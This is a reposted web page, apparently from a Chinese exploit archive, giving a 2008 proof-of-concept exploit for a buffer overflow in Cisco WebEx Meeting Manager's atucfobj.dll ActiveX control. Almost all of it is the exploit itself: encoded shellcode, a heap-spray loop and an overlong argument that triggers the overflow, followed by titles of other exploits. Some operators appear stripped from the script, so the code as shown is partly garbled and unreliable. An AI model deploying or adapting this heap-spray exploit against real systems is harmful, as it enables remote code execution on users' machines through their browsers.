手机
当前位置:查字典教程网 >网络安全 >Exploit >Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
摘要://k`sOSe08/08/2008//testedinIE6,XPSP1varshellcode=unescape("%ue8fc%u00...

<html>

<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />

</object> <script language=javascript> // k`sOSe 08/08/2008

// tested in IE6, XP SP1

var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");

while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;

for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;

for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>

</html>

【Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit】相关文章:

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

MS Internet Explorer (FTP Server Response) DoS Exploit

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

精品推荐
分类导航